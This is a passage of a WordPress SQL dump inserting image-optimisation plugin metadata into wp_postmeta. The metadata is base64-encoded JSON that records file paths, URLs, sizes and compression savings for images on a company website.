wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Flcm9zcGFjZS0xLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNzkxLCJpZCI6NzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMS0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS0xLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWVyb3NwYWNlLTEtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA3OTMsImlkIjo3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS0xLTI0N3gzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWVyb3NwYWNlLTEtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMS0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDc5NSwiaWQiOjc1fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWVyb3NwYWNlLTEtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0Flcm9zcGFjZS0xLTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwNzk4LCJpZCI6NzV9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMS00MDB4NDAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS0xLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvQWVyb3NwYWNlLTEtNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA4MDAsImlkIjo3NX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0Flcm9zcGFjZS0xLTYwMHg2MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvQWVyb3NwYWNlLTEtNjAweDYwMC5qcGciLCJ3aWR0aCI6IjYwMCIsImhlaWdodCI6IjYwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9BZXJvc3BhY2UtMS02MDB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDgwMywiaWQiOjc1fV0='); 
INSERT INTO `wp_postmeta` VALUES (30379, 63, 'wpfc_optimisation_reduction', '48022'); 
INSERT INTO `wp_postmeta` VALUES (30380, 63, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvd29tYW4uanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC93b21hbi5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1OCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3dvbWFuLmpwZyIsInJlZHVjdGlvbiI6NDgwMTYsInRpbWUiOjE0ODM1OTA4MTEsImlkIjoiNjMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3dvbWFuLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvd29tYW4tMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC93b21hbi0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDgxMywiaWQiOjYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3dvbWFuLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvd29tYW4tMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC93b21hbi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDgxNSwiaWQiOjYzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3dvbWFuLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvd29tYW4tMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC93b21hbi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDgxNywiaWQiOjYzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvd29tYW4tMTE0eDEzMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC93b21hbi0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3dvbWFuLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwODE5LCJpZCI6NjN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC93b21hbi0xODB4MTgwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3dvbWFuLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvd29tYW4tMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA4MjEsImlkIjo2M30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3dvbWFuLTI0N3gyNTguanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvd29tYW4tMjQ3eDI1OC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjI1OCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC93b21hbi0yNDd4MjU4LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDgyMywiaWQiOjYzfV0='); 
INSERT INTO `wp_postmeta` VALUES (30381, 62, 'wpfc_optimisation_reduction', '33002'); 
INSERT INTO `wp_postmeta` VALUES (30382, 62, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHVicy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3R1YnMuanBnIiwid2lkdGgiOjIyMCwiaGVpZ2h0IjoxNzksIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90dWJzLmpwZyIsInJlZHVjdGlvbiI6MzI5OTksInRpbWUiOjE0ODM1OTA4MjksImlkIjoiNjIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3R1YnMtMjAweDE3OS5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjE3OSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90dWJzLTIwMHgxNzkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvdHVicy0yMDB4MTc5LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDgzMSwiaWQiOjYyfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHVicy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3R1YnMtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC90dWJzLTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwODMzLCJpZCI6NjJ9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC90dWJzLTE4MHgxNzkuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvdHVicy0xODB4MTc5LmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTc5IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3R1YnMtMTgweDE3OS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA4MzUsImlkIjo2Mn1d'); 
INSERT INTO `wp_postmeta` VALUES (30383, 61, 'wpfc_optimisation_reduction', '93845'); 
INSERT INTO `wp_postmeta` VALUES (30384, 61, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3VpdC5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3N1aXQuanBnIiwid2lkdGgiOjU5MCwiaGVpZ2h0IjoyNTAsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zdWl0LmpwZyIsInJlZHVjdGlvbiI6OTM4MzUsInRpbWUiOjE0ODM1OTA4NDQsImlkIjoiNjEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3N1aXQtMzQweDI1MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zdWl0LTM0MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3VpdC0zNDB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDg0NiwiaWQiOjYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3N1aXQtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zdWl0LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3VpdC0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDg0OSwiaWQiOjYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3N1aXQtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zdWl0LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3VpdC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDg1MSwiaWQiOjYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3N1aXQtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zdWl0LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3VpdC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDg1NCwiaWQiOjYxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3N1aXQtNTEweDI1MC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zdWl0LTUxMHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3VpdC01MTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDg1NiwiaWQiOjYxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3VpdC0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3N1aXQtMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zdWl0LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwODU4LCJpZCI6NjF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zdWl0LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3VpdC0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3N1aXQtMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA4NjAsImlkIjo2MX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3N1aXQtMjQ3eDI1MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zdWl0LTI0N3gyNTAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIyNTAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc3VpdC0yNDd4MjUwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU5MDg2MywiaWQiOjYxfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3VpdC0zMDB4MjUwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3N1aXQtMzAweDI1MC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjI1MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zdWl0LTMwMHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTkwODY1LCJpZCI6NjF9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zdWl0LTQwMHgyNTAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3VpdC00MDB4MjUwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiMjUwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3N1aXQtNDAweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1OTA4NjcsImlkIjo2MX1d'); 
INSERT INTO `wp_postmeta` VALUES (30385, 60, 'wpfc_optimisation_reduction', '120985'); 
INSERT INTO `wp_postmeta` VALUES (30386, 60, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc3ByYXkuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcHJheS5qcGciLCJ3aWR0aCI6NTUwLCJoZWlnaHQiOjQ4MSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NwcmF5LmpwZyIsInJlZHVjdGlvbiI6MTIwOTc1LCJ0aW1lIjoxNDgzNTkwODc1LCJpZCI6IjYwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zcHJheS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NwcmF5LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE